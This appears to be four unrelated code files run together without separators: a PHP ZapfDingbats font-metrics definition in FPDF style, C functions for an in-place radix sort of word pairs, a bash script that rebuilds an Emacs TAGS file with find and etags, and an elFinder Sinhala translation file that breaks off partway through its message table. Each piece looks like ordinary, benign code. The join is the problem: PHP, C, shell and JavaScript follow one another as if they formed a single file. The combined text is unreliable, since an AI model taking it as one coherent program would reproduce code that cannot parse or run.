<?php
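/*
 * ZapfDingbats core-font metrics (FPDF-style font definition file — an
 * assumption based on the variable layout): $up/$ut are the underline
 * position and thickness, $cw maps each character to its advance width,
 * and $uv maps character codes to Unicode code points, either as single
 * values or as array(start, count) ranges.
 */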
$type = 'Core';
$name = 'ZapfDingbats';
$up = -100;
$ut = 50;
$cw = array(
chr(0)=>0,chr(1)=>0,chr(2)=>0,chr(3)=>0,chr(4)=>0,chr(5)=>0,chr(6)=>0,chr(7)=>0,chr(8)=>0,chr(9)=>0,chr(10)=>0,chr(11)=>0,chr(12)=>0,chr(13)=>0,chr(14)=>0,chr(15)=>0,chr(16)=>0,chr(17)=>0,chr(18)=>0,chr(19)=>0,chr(20)=>0,chr(21)=>0,
chr(22)=>0,chr(23)=>0,chr(24)=>0,chr(25)=>0,chr(26)=>0,chr(27)=>0,chr(28)=>0,chr(29)=>0,chr(30)=>0,chr(31)=>0,' '=>278,'!'=>974,'"'=>961,'#'=>974,'$'=>980,'%'=>719,'&'=>789,'\''=>790,'('=>791,')'=>690,'*'=>960,'+'=>939,
','=>549,'-'=>855,'.'=>911,'/'=>933,'0'=>911,'1'=>945,'2'=>974,'3'=>755,'4'=>846,'5'=>762,'6'=>761,'7'=>571,'8'=>677,'9'=>763,':'=>760,';'=>759,'<'=>754,'='=>494,'>'=>552,'?'=>537,'@'=>577,'A'=>692,
'B'=>786,'C'=>788,'D'=>788,'E'=>790,'F'=>793,'G'=>794,'H'=>816,'I'=>823,'J'=>789,'K'=>841,'L'=>823,'M'=>833,'N'=>816,'O'=>831,'P'=>923,'Q'=>744,'R'=>723,'S'=>749,'T'=>790,'U'=>792,'V'=>695,'W'=>776,
'X'=>768,'Y'=>792,'Z'=>759,'['=>707,'\\'=>708,']'=>682,'^'=>701,'_'=>826,'`'=>815,'a'=>789,'b'=>789,'c'=>707,'d'=>687,'e'=>696,'f'=>689,'g'=>786,'h'=>787,'i'=>713,'j'=>791,'k'=>785,'l'=>791,'m'=>873,
'n'=>761,'o'=>762,'p'=>762,'q'=>759,'r'=>759,'s'=>892,'t'=>892,'u'=>788,'v'=>784,'w'=>438,'x'=>138,'y'=>277,'z'=>415,'{'=>392,'|'=>392,'}'=>668,'~'=>668,chr(127)=>0,chr(128)=>390,chr(129)=>390,chr(130)=>317,chr(131)=>317,
chr(132)=>276,chr(133)=>276,chr(134)=>509,chr(135)=>509,chr(136)=>410,chr(137)=>410,chr(138)=>234,chr(139)=>234,chr(140)=>334,chr(141)=>334,chr(142)=>0,chr(143)=>0,chr(144)=>0,chr(145)=>0,chr(146)=>0,chr(147)=>0,chr(148)=>0,chr(149)=>0,chr(150)=>0,chr(151)=>0,chr(152)=>0,chr(153)=>0,
chr(154)=>0,chr(155)=>0,chr(156)=>0,chr(157)=>0,chr(158)=>0,chr(159)=>0,chr(160)=>0,chr(161)=>732,chr(162)=>544,chr(163)=>544,chr(164)=>910,chr(165)=>667,chr(166)=>760,chr(167)=>760,chr(168)=>776,chr(169)=>595,chr(170)=>694,chr(171)=>626,chr(172)=>788,chr(173)=>788,chr(174)=>788,chr(175)=>788,
chr(176)=>788,chr(177)=>788,chr(178)=>788,chr(179)=>788,chr(180)=>788,chr(181)=>788,chr(182)=>788,chr(183)=>788,chr(184)=>788,chr(185)=>788,chr(186)=>788,chr(187)=>788,chr(188)=>788,chr(189)=>788,chr(190)=>788,chr(191)=>788,chr(192)=>788,chr(193)=>788,chr(194)=>788,chr(195)=>788,chr(196)=>788,chr(197)=>788,
chr(198)=>788,chr(199)=>788,chr(200)=>788,chr(201)=>788,chr(202)=>788,chr(203)=>788,chr(204)=>788,chr(205)=>788,chr(206)=>788,chr(207)=>788,chr(208)=>788,chr(209)=>788,chr(210)=>788,chr(211)=>788,chr(212)=>894,chr(213)=>838,chr(214)=>1016,chr(215)=>458,chr(216)=>748,chr(217)=>924,chr(218)=>748,chr(219)=>918,
chr(220)=>927,chr(221)=>928,chr(222)=>928,chr(223)=>834,chr(224)=>873,chr(225)=>828,chr(226)=>924,chr(227)=>924,chr(228)=>917,chr(229)=>930,chr(230)=>931,chr(231)=>463,chr(232)=>883,chr(233)=>836,chr(234)=>836,chr(235)=>867,chr(236)=>867,chr(237)=>696,chr(238)=>696,chr(239)=>874,chr(240)=>0,chr(241)=>874,
chr(242)=>760,chr(243)=>946,chr(244)=>771,chr(245)=>865,chr(246)=>771,chr(247)=>888,chr(248)=>967,chr(249)=>888,chr(250)=>831,chr(251)=>873,chr(252)=>927,chr(253)=>970,chr(254)=>918,chr(255)=>0);
$uv = array(32=>32,33=>array(9985,4),37=>9742,38=>array(9990,4),42=>9755,43=>9758,44=>array(9996,28),72=>9733,73=>array(10025,35),108=>9679,109=>10061,110=>9632,111=>array(10063,4),115=>9650,116=>9660,117=>9670,118=>10070,119=>9687,120=>array(10072,7),128=>array(10088,14),161=>array(10081,7),168=>9827,169=>9830,170=>9829,171=>9824,172=>array(9312,10),182=>array(10102,31),213=>8594,214=>array(8596,2),216=>array(10136,24),241=>array(10161,14));
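// Illustrative use with FPDF (assumed; not part of this metrics file):
//   $pdf = new FPDF();
//   $pdf->AddPage();
//   $pdf->SetFont('ZapfDingbats', '', 14); // core font, no AddFont() needed
//   $pdf->Cell(0, 10, chr(52));            // prints a dingbat glyph (U+2714 per $uv)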
?>
static GtUwordPair gt_radixsort_ulongpair_bin_get(
const GtRadixbuffer *rbuf,
GtUword binnum)
{
return rbuf->values.ulongpairptr[
(binnum << rbuf->log_bufsize) +
(GtUword) rbuf->nextidx[binnum]];
}
static inline void gt_radixsort_ulongpair_bin_update(
GtUwordPair *source,
GtRadixbuffer *rbuf,
GtUword binnum,
GtUwordPair value)
{
GtUword binoffset = binnum << rbuf->log_bufsize;
rbuf->values.ulongpairptr
[binoffset + (GtUword) rbuf->nextidx[binnum]]=
value;
if ((GtUword) rbuf->nextidx[binnum] < rbuf->buf_size - 1)
{
rbuf->nextidx[binnum]++;
} else
{
GtUword j;
GtUwordPair *wsourceptr, *rsourceptr, *rend, *valptr;
wsourceptr = source +
(rbuf->endofbin[binnum] - (rbuf->buf_size - 1))
;
rsourceptr = wsourceptr + rbuf->buf_size;
rend = source + rbuf->startofbin[binnum+1];
valptr = rbuf->values.ulongpairptr +
binoffset;
for (j=0; j<rbuf->buf_size; j++)
{
*wsourceptr = *valptr;
wsourceptr++;
if (rsourceptr < rend)
{
*valptr = *rsourceptr;
rsourceptr++;
}
valptr++;
}
rbuf->nextidx[binnum] = 0;
}
rbuf->endofbin[binnum]++;
}
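/* Sketch of the cached shuffle below (descriptive comment, not from the
original source): the key byte selected by "rightshift" is counted per
bin (256 bins), bin start/end offsets are derived from the counts, and
the elements are then permuted into their bins in place. Reads and
writes are staged through per-bin buffers of "buf_size" elements (see
gt_radixsort_ulongpair_bin_update above) to improve cache locality; any
elements still sitting in the buffers are flushed back at the end. */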
static void gt_radixsort_ulongpair_cached_shuffle(GtRadixbuffer *rbuf,
GtUwordPair *source,
GtCountbasetype len,
size_t rightshift)
{
GtUword binoffset, binnum, bufoffset,
nextbin, firstnonemptybin = UINT8_MAX+1;
GtCountbasetype *count, previouscount, currentidx;
GtUwordPair *sourceptr,
*sourceend = source + len;
rbuf->countcached++;
count = rbuf->startofbin; /* use same memory for count and startofbin */
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
count[binnum] = 0;
rbuf->nextidx[binnum] = 0;
}
for (sourceptr = source; sourceptr < sourceend; sourceptr++)
{
count[GT_RADIX_KEY(UINT8_MAX,rightshift,sourceptr->a)]++;
}
for (bufoffset = 0, binoffset = 0, binnum = 0; binnum <= UINT8_MAX;
bufoffset += rbuf->buf_size, binoffset += count[binnum], binnum++)
{
const GtUword elems2copy = GT_MIN(rbuf->buf_size,(GtUword) count[binnum]);
if (elems2copy > 0)
{
if (firstnonemptybin == UINT8_MAX+1)
{
firstnonemptybin = binnum;
}
memcpy(rbuf->values.
ulongpairptr + bufoffset,
source + binoffset,
(sizeof *source * elems2copy));
}
}
previouscount = count[0];
rbuf->startofbin[0] = rbuf->endofbin[0] = 0;
nextbin = 0;
for (binnum = 1UL; binnum <= UINT8_MAX; binnum++)
{
GtCountbasetype temp = rbuf->startofbin[binnum-1] + previouscount;
previouscount = count[binnum];
rbuf->startofbin[binnum] = rbuf->endofbin[binnum] = temp;
}
/* to simplify computation of bin end */
rbuf->startofbin[UINT8_MAX+1] = len;
for (currentidx = 0, binnum = firstnonemptybin;
currentidx < len; binnum = nextbin - 1)
{
GtUwordPair tmpvalue;
tmpvalue = gt_radixsort_ulongpair_bin_get(rbuf,binnum);
while (true)
{
binnum = GT_RADIX_KEY(UINT8_MAX,rightshift,tmpvalue.a);
if (currentidx != rbuf->endofbin[binnum])
{
GtUwordPair tmpswap;
tmpswap = tmpvalue;
tmpvalue = gt_radixsort_ulongpair_bin_get(rbuf,binnum);
gt_radixsort_ulongpair_bin_update
(source,rbuf,binnum,
tmpswap);
} else
{
break;
}
}
gt_radixsort_ulongpair_bin_update(source,rbuf,binnum,
tmpvalue);
currentidx++;
/* skip over empty bins */
while (nextbin <= UINT8_MAX && currentidx >= rbuf->startofbin[nextbin])
{
nextbin++;
}
/* skip over full bins */
while (nextbin <= UINT8_MAX &&
rbuf->endofbin[nextbin-1] == rbuf->startofbin[nextbin])
{
nextbin++;
}
if (currentidx < rbuf->endofbin[nextbin-1])
{
currentidx = rbuf->endofbin[nextbin-1];
}
}
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
GtUword bufleft = (GtUword) rbuf->nextidx[binnum];
if (bufleft > 0)
{
GtUwordPair *sourceptr, *valptr;
valptr = rbuf->values.ulongpairptr +
(binnum << rbuf->log_bufsize);
sourceptr = source +
(rbuf->startofbin[binnum+1] - bufleft);
memcpy(sourceptr,valptr,(sizeof *sourceptr * bufleft));
}
}
}
static void gt_radixsort_ulongpair_uncached_shuffle(
GtRadixbuffer *rbuf,
GtUwordPair *source,
GtCountbasetype len,
size_t rightshift)
{
GtUword binnum, nextbin;
GtCountbasetype currentidx, previouscount, *count;
GtUwordPair *sourceptr,
*sourceend = source + len;
rbuf->countuncached++;
count = rbuf->startofbin; /* use same memory for count and startofbin */
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
count[binnum] = 0;
rbuf->nextidx[binnum] = 0;
}
for (sourceptr = source; sourceptr < sourceend; sourceptr++)
{
count[GT_RADIX_KEY(UINT8_MAX,rightshift,sourceptr->a)]++;
}
previouscount = count[0];
rbuf->startofbin[0] = rbuf->endofbin[0] = 0;
nextbin = 0;
for (binnum = 1UL; binnum <= UINT8_MAX; binnum++)
{
GtCountbasetype temp = rbuf->startofbin[binnum-1] + previouscount;
previouscount = count[binnum];
rbuf->startofbin[binnum] = rbuf->endofbin[binnum] = temp;
}
/* to simplify computation of bin end */
rbuf->startofbin[UINT8_MAX+1] = len;
for (currentidx = 0; currentidx < len; /* Nothing */)
{
GtCountbasetype *binptr;
GtUwordPair tmpvalue;
tmpvalue = source[currentidx];
while (true)
{
binptr = rbuf->endofbin +
(GT_RADIX_KEY(UINT8_MAX,rightshift,tmpvalue.a));
binnum = *binptr;
if (currentidx != binnum)
{
GtUwordPair tmpswap;
tmpswap = tmpvalue;
tmpvalue = source[binnum];
source[binnum] = tmpswap;
(*binptr)++;
} else
{
break;
}
}
source[binnum] = tmpvalue;
currentidx++;
(*binptr)++;
/* skip over empty bins */
while (nextbin <= UINT8_MAX && currentidx >= rbuf->startofbin[nextbin])
{
nextbin++;
}
/* skip over full bins */
while (nextbin <= UINT8_MAX &&
rbuf->endofbin[nextbin-1] == rbuf->startofbin[nextbin])
{
nextbin++;
}
if (currentidx < rbuf->endofbin[nextbin-1])
{
currentidx = rbuf->endofbin[nextbin-1];
}
}
}
static void gt_radixsort_ulongpair_shuffle(GtRadixbuffer *rbuf,
GtUwordPair *source,
GtCountbasetype len,
size_t rightshift)
{
gt_assert(rbuf != NULL);
if ((GtUword) len > rbuf->cachesize)
{
gt_radixsort_ulongpair_cached_shuffle(rbuf,source,len,rightshift);
} else
{
gt_radixsort_ulongpair_uncached_shuffle(rbuf,source,len,
rightshift);
}
}
static void
gt_radixsort_ulongpair_inplace_insertionsort(
GT_UNUSED GtRadixbuffer *rbuf,
GtUwordPair *arr,
GtCountbasetype a_size)
{
GtUwordPair *optr,
*end = arr + a_size;
for (optr = arr + 1; optr < end;
optr++)
{
GtUwordPair *oprevious = optr - 1;
if (optr->a < oprevious->a)
{
GtUwordPair *iptr;
GtUwordPair tmpvalue;
tmpvalue = *optr;
*optr = *oprevious;
for (iptr = oprevious; iptr > arr; iptr -= 1)
{
GtUwordPair *iprevious = iptr - 1;
if (!(tmpvalue.a < iprevious->a))
{
break;
}
*iptr = *iprevious;
}
*iptr = tmpvalue;
}
}
}
static void gt_radixsort_ulongpair_process_bin(
GtStackGtRadixsort_stackelem *stack,
GtRadixbuffer *rbuf,
GtUwordPair *source,
size_t shift)
{
GtUword binnum;
for (binnum = 0; binnum <= UINT8_MAX; binnum++)
{
GtCountbasetype width = rbuf->endofbin[binnum] - rbuf->startofbin[binnum];
if (width >= (GtCountbasetype) 2)
{
GtUwordPair *ptr
= source + rbuf->startofbin[binnum];
if (width == (GtCountbasetype) 2)
{
GtUwordPair *nextptr = ptr + 1;
if (nextptr->a < ptr->a)
{
GtUwordPair tmpswap;
tmpswap = *ptr;
*ptr = *nextptr;
*nextptr = tmpswap;
}
} else
{
if (width <= (GtCountbasetype) 32)
{
rbuf->countinsertionsort++;
gt_radixsort_ulongpair_inplace_insertionsort(rbuf,ptr,width);
} else
{
GtRadixsort_stackelem tmpstackelem;
tmpstackelem.left.ulongpairptr = ptr;
tmpstackelem.len = width;
tmpstackelem.shift = shift - CHAR_BIT;
GT_STACK_PUSH(stack,tmpstackelem);
}
}
}
}
}
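/* Descriptive note (not from the original source): the driver below
implements MSD radix sort with an explicit stack instead of recursion.
Each popped element is shuffled on its current key byte; process_bin
then handles the resulting bins: width 2 is swapped directly, widths
up to 32 fall back to insertion sort, and larger bins are pushed back
onto the stack with the shift reduced by CHAR_BIT. */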
static void gt_radixsort_ulongpair_sub_inplace(GtRadixbuffer *rbuf,
GtStackGtRadixsort_stackelem *stack)
{
GtRadixsort_stackelem currentstackelem;
while (!GT_STACK_ISEMPTY(stack))
{
currentstackelem = GT_STACK_POP(stack);
gt_radixsort_ulongpair_shuffle(rbuf,
currentstackelem.left.ulongpairptr,
currentstackelem.len,
currentstackelem.shift);
if (currentstackelem.shift > 0)
{
(void) gt_radixsort_ulongpair_process_bin(stack,rbuf,
currentstackelem.left.ulongpairptr,
currentstackelem.shift);
}
}
}
#!/usr/bin/env bash
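# Rebuild an Emacs TAGS file for the current tree: prune VCS/metadata
# directories and build artifacts, then feed the remaining source files
# (C/C++, Python, Java, Elisp, Perl, ...) to etags. Extra arguments are
# passed straight through to etags via "$@".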
export PATH=~/tools/emacswin/bin/:/bin:/usr/bin:"$PATH"
rm TAGS
find . \( '-path' '*/CVS' \
'-o' '-path' '*/.svn' \
'-o' '-path' '*/autom4te.cache' \
'-o' '-path' '*/{arch}' \
'-o' '-path' '*/.hg' \
'-o' '-path' '*/_darcs' \
'-o' '-path' '*/.git' \
'-o' '-path' '*/.bzr' \
'-o' '-path' '*~*' \
'-o' '-path' '*#' \
'-o' '-path' '*/TAGS' \
'-o' '-path' '*/semantic.cache' \
'-o' '-iname' '*.o' \
'-o' '-iname' '*.class' \
'-o' '-iname' '*.obj' \
'-o' '-iname' '*.pyc' \
'-o' '-path' '*/.ignore' \) -prune \
-o -type f \( -iname '*.cpp' \
-o -iname '*.hpp' \
-o -iname '*.s' \
-o -iname '*.h' \
-o -iname '*.c' \
-o -iname '*.cc' \
-o -iname '*.py' \
-o -iname '*.java' \
-o -iname '*.el' \
-o -iname '*.pl' \
-o -iname '*.inl' \
-o -iname '*.aidl' \
\) -print0 |xargs -0 etags -a "$@"
/**
* Sinhala translation
* @author CodeLyokoXtEAM <[email protected]>
* @version 2018-03-26
*/
(function(root, factory) {
if (typeof define === 'function' && define.amd) {
define(['elfinder'], factory);
} else if (typeof exports !== 'undefined') {
module.exports = factory(require('elfinder'));
} else {
factory(root.elFinder);
}
}(this, function(elFinder) {
elFinder.prototype.i18.si = {
translator : 'CodeLyokoXtEAM <[email protected]>',
language : 'Sinhala',
direction : 'ltr',
dateFormat : 'Y.m.d h:i A', // Mar 13, 2012 05:27 PM
fancyDateFormat : '$1 h:i A', // will produce smth like: Today 12:25 PM
nonameDateFormat : 'Ymd-His', // to apply if upload file is noname: 120513172700
messages : {
/********************************** errors **********************************/
'error' : 'දෝෂයකි.',
'errUnknown' : 'නොදන්නා දෝෂයකි.',
'errUnknownCmd' : 'නොදන්නා විධානයකි.',
'errJqui' : 'වලංගු නොවන jQuery UI සැකැස්මකි. තේරිය හැකි, ඇදගෙන යාම සහ ඇද දැමිය හැකි කොටස් ඇතුළත් කළ යුතුය.',
'errNode' : 'ElFinder විසින් DOM Element නිර්මාණය කිරීමට අවශ්යව අැත.',
'errURL' : 'වලංගු නොවන elFinder සැකැස්මකි! URL විකල්පය සැකසා නැත.',
'errAccess' : 'භාවිතය අත්හිටුවා ඇත.',
'errConnect' : 'පසුබිම(Backend) වෙත සම්බන්ධ වීමට නොහැකිය.',
'errAbort' : 'සම්බන්ධතාවය වසාදමා ඇත.',
'errTimeout' : 'සම්බන්ධතා කල් ඉකුත්වී ඇත.',
'errNotFound' : 'පසුබිම(Backend) සොයාගත නොහැකි විය.',
'errResponse' : 'වලංගු නොවන පසුබිම(Backend) ප්රතිචාරය.',
'errConf' : 'වලංගු නොවන Backend සැකැස්මකි.',
'errJSON' : 'PHP JSON මොඩියුලය ස්ථාපනය කර නැත.',
'errNoVolumes' : 'කියවිය හැකි එ්කක(volumes) නොමැත.',
'errCmdParams' : '"$1" නම් විධානය වලංගු නොවන පරාමිතියකි.',
'errDataNotJSON' : 'JSON දත්ත නොවේ.',
'errDataEmpty' : 'හිස් දත්තයකි.',
'errCmdReq' : 'Backend සඳහා ඉල්ලන ලද විධානයේ නම අවශ්ය වේ.',
'errOpen' : '"$1" විවෘත කළ නොහැක.',
'errNotFolder' : 'අායිත්තම(object) ෆොල්ඩරයක් නොවේ.',
'errNotFile' : 'අායිත්තම(object) ගොනුවක් නොවේ.',
'errRead' : '"$1" කියවීමට නොහැක.',
'errWrite' : '"$1" තුල ලිවීමට නොහැකිය.',
'errPerm' : 'අවසරය නොමැත.',
'errLocked' : '"$1" අගුළු දමා ඇති අතර එය නැවත නම් කිරීම, සම්පූර්ණයෙන් විස්ථාපනය කිරීම හෝ ඉවත් කිරීම කළ නොහැක.',
'errExists' : '"$1" නම් ගොනුව දැනටමත් පවතී.',
'errInvName' : 'ගොනු නම වලංගු නොවේ.',
'errInvDirname' : 'ෆෝල්ඩර් නම වලංගු නොවේ.', // from v2.1.24 added 12.4.2017
'errFolderNotFound' : 'ෆෝල්ඩරය හමු නොවිණි.',
'errFileNotFound' : 'ගොනුව හමු නොවිණි.',
'errTrgFolderNotFound' : 'ඉලක්කගත ෆෝල්ඩරය "$1" හමු නොවිනි.',
'errPopup' : 'බ්රවුසරය උත්පතන කවුළුව විවෘත කිරීම වළක්වයි. ගොනු විවෘත කිරීම සඳහා බ්රවුසරයේ විකල්ප තුළ එය සක්රිය කරන්න.',
'errMkdir' : '"$1" ෆෝල්ඩරය සෑදීමට නොහැකිය.',
'errMkfile' : '"$1" ගොනුව සෑදිය නොහැක.',
'errRename' : '"$1" නැවත නම් කිරීමට නොහැකි විය.',
'errCopyFrom' : '"$1" volume යෙන් ගොනු පිටපත් කිරීම තහනම්ය.',
'errCopyTo' : '"$1" volume යට ගොනු පිටපත් කිරීම තහනම්ය.',
'errMkOutLink' : 'volume root යෙන් පිටතට සබැඳිය(link) නිර්මාණය කිරීමට නොහැකි විය.', // from v2.1 added 03.10.2015
'errUpload' : 'උඩුගත(upload) කිරීමේ දෝෂයකි.', // old name - errUploadCommon
'errUploadFile' : '"$1" උඩුගත(upload) කිරීමට නොහැකි විය.', // old name - errUpload
'errUploadNoFiles' : 'උඩුගත(upload) කිරීම සඳහා ගොනු කිසිවක් සොයාගත නොහැකි විය.',
'errUploadTotalSize' : 'දත්ත අවසර දී අැති උපරිම ප්රමාණය ඉක්මවා ඇත.', // old name - errMaxSize
'errUploadFileSize' : 'ගොනු අවසර දී අැති උපරිම ප්රමාණය ඉක්මවා ඇත.', // old name - errFileMaxSize
'errUploadMime' : 'ගොනු වර්ගයට අවසර නැත.',
'errUploadTransfer' : '"$1" ව මාරු කිරීමේ දෝෂයකි.',
'errUploadTemp' : 'upload කිරීම සඳහා තාවකාලික ගොනුව සෑදිය නොහැක.', // from v2.1 added 26.09.2015
'errNotReplace' : '"$1" අායිත්තම(object) දැනටමත් මෙම ස්ථානයේ පවතී, වෙනත් වර්ගයකිනි ප්රතිස්ථාපනය කළ නොහැක.', // new
'errReplace' : '"$1" ප්රතිස්ථාපනය කළ නොහැක.',
'errSave' : '"$1" සුරැකීමට නොහැක.',
'errCopy' : '"$1" පිටපත් කිරීමට නොහැක.',
'errMove' : '"$1" සම්පූර්ණයෙන් විස්ථාපනය කිරීමට නොහැක.',
'errCopyInItself' : '"$1" තුලට පිටපත් කිරීමට නොහැක.',
'errRm' : '"$1" ඉවත් කිරීමට නොහැකි විය.',
'errTrash' : 'කුණු-කූඩය තුලට දැමීමට නොහැක.', // from v2.1.24 added 30.4.2017
'errRmSrc' : 'මූලාශ්රය ගොනු(ව) ඉවත් කළ නොහැක.',
'errExtract' : '"$1" වෙතින් ගොනු දිග හැරීමට නොහැක.',
'errArchive' : 'සංරක්ෂිතය සෑදීමට නොහැකි විය.',
'errArcType' : 'නොගැලපෙන සංරක්ෂණ වර්ගයකි.',
'errNoArchive' : 'ගොනුව නොගැලපෙන සංරක්ෂණ වර්ගයක් හෝ සංරක්ෂිතයක් නොවේ.',
'errCmdNoSupport' : 'පසුබිම(Backend) මෙම විධානය නොදනී.',
'errReplByChild' : '"$1" ෆෝල්ඩරය එහිම අඩංගු අයිතමයක් මගින් ප්රතිස්ථාපනය කළ නොහැක.',
'errArcSymlinks' : 'ආරක්ෂිත හේතුව නිසා අනුමත නොකෙරෙන සබැඳි සම්බන්දතා හෝ ලිපිගොනු නම් අඩංගු බැවින් සංරක්ෂිතය දිග හැරීම කිරීමට ඉඩ නොදෙන.', // edited 24.06.2012
'errArcMaxSize' : 'සංරක්ෂිතය ලිපිගොනු උපරිම ප්රමාණය ඉක්මවා ඇත.',
'errResize' : 'ප්රතිප්රමාණය කිරීමට නොහැකි විය.',
'errResizeDegree' : 'වලංගු නොවන භ්රමණ කෝණයකි.', // added 7.3.2013
'errResizeRotate' : 'රූපය භ්රමණය කිරීමට නොහැකි විය.', // added 7.3.2013
'errResizeSize' : 'රූපයේ ප්රමාණය වලංගු නොවේ.', // added 7.3.2013
'errResizeNoChange' : 'රූපයේ ප්රමාණය වෙනස් නොවුණි.', // added 7.3.2013
'errUsupportType' : 'නොගැලපෙන ගොනු වර්ගයකි.',
'errNotUTF8Content' : '"$1" ගොනුව UTF-8 හි නොමැති අතර සංස්කරණය කළ නොහැක.', // added 9.11.2011
'errNetMount' : '"$1" සවි(mount) කිරීමට නොහැක.', // added 17.04.2012
'errNetMountNoDriver' : 'ප්රොටොකෝලය(protocol) නොගැලපේ.', // added 17.04.2012
'errNetMountFailed' : 'සවි කිරීම(mount කිරීම) අසාර්ථක විය.', // added 17.04.2012
'errNetMountHostReq' : 'ධාරකය(Host) අවශ්ය වේ.', // added 18.04.2012
'errSessionExpires' : 'ඔබේ අක්රියතාව හේතුවෙන් සැසිය(session) කල් ඉකුත් වී ඇත.',
'errCreatingTempDir' : 'තාවකාලික ඩිරෙක්ටරයක්(directory) සෑදිය නොහැක: "$1"',
'errFtpDownloadFile' : 'FTP වලින් ගොනුව බාගත(download) කිරීමට නොහැකි විය: "$1"',
'errFtpUploadFile' : 'ගොනුව FTP වෙත උඩුගත(upload) කිරීමට නොහැකි විය: "$1"',
'errFtpMkdir' : 'FTP මත දුරස්ථ නාමාවලියක්(remote directory) නිර්මාණය කිරීමට නොහැකි විය: "$1"',
'errArchiveExec' : 'ගොනු සංරක්ෂණය(archiving) කිරීමේදී දෝෂයක් ඇතිවිය: "$1"',
'errExtractExec' : 'ගොනු දිගහැරීමේදී(extracting) දෝෂයක් ඇතිවිය: "$1"',
'errNetUnMount' : 'විසන්ධි කිරීමට(unmount) නොහැක.', // from v2.1 added 30.04.2012
'errConvUTF8' : 'UTF-8 වෙත පරිවර්තනය කළ නොහැක.', // from v2.1 added 08.04.2014
'errFolderUpload' : 'ඔබ ෆෝල්ඩරය උඩුගත(upload) කිරීමට කැමති නම් නවීන බ්රවුසරයකින් උත්සාහ කරන්න.', // from v2.1 added 26.6.2015
'errSearchTimeout' : '"$1" සෙවීම කල් ඉකුත්වී ඇත. සෙවුම් ප්රතිඵල අර්ධ වශයෙන් දිස්වේ.', // from v2.1 added 12.1.2016
'errReauthRequire' : 'නැවත බලය(Re-authorization) ලබා දීම අවශ්ය වේ.', // from v2.1.10 added 24.3.2016
'errMaxTargets' : 'තෝරා ගත හැකි උපරිම අයිතම සංඛ්යාව $1 ක් වේ.', // from v2.1.17 added 17.10.2016
'errRestore' : 'කුණු කූඩයෙන් නැවත ලබා ගත නොහැක. යළි පිහිටුවීමේ ගමනාන්තය(restore destination) හඳුනාගත නොහැක.', // from v2.1.24 added 3.5.2017
'errEditorNotFound' : 'මෙම ගොනු වර්ගයේ සංස්කාරකය හමු නොවිණි.', // from v2.1.25 added 23.5.2017
'errServerError' : 'සේවාදායකයේ පැත්තෙන්(server side) දෝශයක් ඇතිවිය.', // from v2.1.25 added 16.6.2017
'errEmpty' : '"$1" ෆෝල්ඩරය හිස් කිරීමට නොහැක.', // from v2.1.25 added 22.6.2017
/******************************* commands names ********************************/
'cmdarchive' : 'සංරක්ෂිතය(archive) නිර්මාණය කරන්න',
'cmdback' : 'ආපසු',
'cmdcopy' : 'පිටපත් කරන්න',
'cmdcut' : 'මුළුමනින්ම පිටපත් කරන්න(Cut)',
'cmddownload' : 'බාගත කරන්න(Download)',
'cmdduplicate' : 'අනුපිටපත් කරන්න(Duplicate)',
'cmdedit' : 'ගොනුව සංස්කරණය කරන්න',
'cmdextract' : 'සංරක්ෂිතයේ ගොනු දිගහරින්න(Extract)',
'cmdforward' : 'ඉදිරියට',
'cmdgetfile' : 'ගොනු තෝරන්න',
'cmdhelp' : 'මෙම මෘදුකාංගය පිළිබඳව',
'cmdhome' : 'නිවහන(Home)',
'cmdinfo' : 'තොරතුරු ලබාගන්න',
'cmdmkdir' : 'අළුත් ෆෝල්ඩරයක්',
'cmdmkdirin' : 'අළුත් ෆෝල්ඩරයක් තුළට', // from v2.1.7 added 19.2.2016
'cmdmkfile' : 'නව ගොනුවක්',
'cmdopen' : 'විවෘත කරන්න',
'cmdpaste' : 'දමන්න(Paste)',
'cmdquicklook' : 'පූර්ව දර්ශනයක්(Preview)',
'cmdreload' : 'නැවත අළුත් කරන්න(Reload)',
'cmdrename' : 'නම වෙනස් කරන්න',
'cmdrm' : 'මකන්න',
'cmdtrash' : 'කුණු කූඩයට දමන්න', //from v2.1.24 added 29.4.2017
'cmdrestore' : 'යළි පිහිටුවන්න(Restore)', //from v2.1.24 added 3.5.2017
'cmdsearch' : 'ගොනු සොයන්න',
'cmdup' : 'ප්ර්රධාන නාමාවලිය(parent directory) වෙත යන්න',
'cmdupload' : 'ගොනු උඩුගත(Upload) කරන්න',
'cmdview' : 'දර්ශනය(View)',
'cmdresize' : 'ප්රථිප්රමාණය සහ භ්රමණය',
'cmdsort' : 'වර්ගීකරණය කරන්න',
'cmdnetmount' : 'ජාල එ්කකයක් සවි කරන්න(Mount network volume)', // added 18.04.2012
'cmdnetunmount': 'ගලවන්න(Unmount)', // from v2.1 added 30.04.2012
'cmdplaces' : 'පහසු ස්ථානයට(To Places)', // added 28.12.2014
'cmdchmod' : 'ක්රමය වෙනස් කරන්න', // from v2.1 added 20.6.2015
'cmdopendir' : 'ෆෝල්ඩරය විවෘත කරන්න', // from v2.1 added 13.1.2016
'cmdcolwidth' : 'නැවත තීරු පළල පිහිටුවන්න', // from v2.1.13 added 12.06.2016
'cmdfullscreen': 'පුළුල් තිරය', // from v2.1.15 added 03.08.2016
'cmdmove' : 'මාරු කරන්න(Move)', // from v2.1.15 added 21.08.2016
'cmdempty' : 'ෆෝල්ඩරය හිස් කරන්න', // from v2.1.25 added 22.06.2017
'cmdundo' : 'නිෂ්ප්රභ කරන්න', // from v2.1.27 added 31.07.2017
'cmdredo' : 'නැවත කරන්න', // from v2.1.27 added 31.07.2017
'cmdpreference': 'අභිමතයන් (Preferences)', // from v2.1.27 added 03.08.2017
'cmdselectall' : 'සියල්ල තෝරන්න', // from v2.1.28 added 15.08.2017
'cmdselectnone': 'කිසිවක් තෝරන්න එපා', // from v2.1.28 added 15.08.2017
'cmdselectinvert': 'විරුද්ධ අාකාරයට තෝරන්න', // from v2.1.28 added 15.08.2017
/*********************************** buttons ***********************************/
'btnClose' : 'වසන්න',
'btnSave' : 'සුරකින්න',
'btnRm' : 'ඉවත් කරන්න',
'btnApply' : 'යොදන්න(Apply)',
'btnCancel' : 'අවලංගු කරන්න',
'btnNo' : 'නැත',
'btnYes' : 'ඔව්',
'btnMount' : 'සවිකිරීම(Mount)', // added 18.04.2012
'btnApprove': 'කරුණාකර $1 අනුමත කරන්න', // from v2.1 added 26.04.2012
'btnUnmount': 'ගලවන්න(Unmount)', // from v2.1 added 30.04.2012
'btnConv' : 'පරිවර්තනය කරන්න', // from v2.1 added 08.04.2014
